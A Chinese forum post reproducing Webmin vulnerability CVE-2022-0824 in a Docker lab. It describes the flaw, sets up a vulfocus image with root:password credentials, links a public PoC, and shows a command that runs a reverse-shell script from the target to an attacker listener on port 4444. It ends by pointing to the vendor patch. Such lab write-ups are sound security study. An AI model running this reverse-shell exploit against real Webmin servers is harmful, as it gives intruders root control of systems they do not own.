找回密码
 立即注册
注册 登录
×
热搜: 活动 交友 discuz
查看: 57|回复: 0

Webmin 漏洞 CVE-2022-0824复现

[复制链接]

1

主题

1

帖子

3

积分

新手上路

Rank: 1

积分
3
发表于 2022-12-22 18:33:22 | 显示全部楼层 |阅读模式
WEBmin简介

Webmin 是一个基于 Web 的 Linux/Unix 系统管理软件。
简单地说,就是你可以打开一个浏览器,然后输入 Webmin 的管理地址,在打开的页面中就可以管理你的 Linux/Unix 系统了。
Webmin 功能强大,可以管理设置很多东西,比如用户帐户、Apache 服务、DNS 、文件共享等等,几乎所有的东西都能给你管上一管。
Webmin 是由一个简单的 Web 服务器和一些 CGI 程序组成的系统,Web 服务器和所有 CGI 程序都是使用 Perl 5,并且不使用非标准的 Perl 模块。
它通过管理相应的系统配置文件来实现管理目的,比如它直接通过访问编辑 /etc/passwd 来管理用户密码等等。
因此,我们可以借助 Webmin 来辅助我们学习配置 Linux 系统。
Webmin 官网首页
https://www.webmin.com/
目前最新的版本为2022年11月27日更新的Webmin 2.010


漏洞介绍

漏洞描述

在 Webmin v1.984 中,影响文件管理器模块,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程 URL 下载文件和更改文件权限 (chmod)。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行。
其他漏洞信息可以参考CVE,NVD,CNVD,CNNVD等漏洞库的披露。
编号

CVE编号:CVE-2022-0824
CNVD编号:CNVD-2022-17023
CNNVD编号::CNNVD-202203-076
危险等级:

该漏洞 CVSS:3.1评分为8.8 ,属于高危漏洞
影响版本:

Webmin Webmin < Webmin Webmin1.990    //1.990版本之前均受影响
环境搭建

webmin可以下载对应版本自行搭建,也可以直接拉取docker镜像,本次以docker镜像进行复现。
尝试vulfoucs起环境 (后面要进行流量抓取和分析,这里抓流量不好抓),换kali机起docker
POC/EXP:已公开

POC地址
https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell
拉取漏洞镜像和访问

docker pull vulfocus/webmin_cve-2022-0824:latest
docker run -itd -p 10000:10000 -d vulfocus/webmin_cve-2022-0824

访问映射地址127.0.0.1:10000,账户: root 密码: password


如上,漏洞环境搭建完毕。
漏洞复现

目标站点:http://127.0.0.1:10000 ,IP为192.168.171.132
攻击端:linux-kali ,IP为192.168.171.144
在攻击端监听端口4444:
将POC文件下载,并且执行利用脚本
python3 Webmin-revshell.py -t http://192.168.171.132:10000 -c root:password -LS 192.168.171.144:9090 -L 192.168.171.144 -P 4444


成功执行命令并且获取root权限

解决方案

更新到最新版本 附带厂商补丁链接:https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋| 黑客通

GMT+8, 2025-10-12 19:11 , Processed in 0.098999 second(s), 23 queries .

Powered by Discuz! X3.4

Copyright © 2020, LianLian.

快速回复 返回顶部 返回列表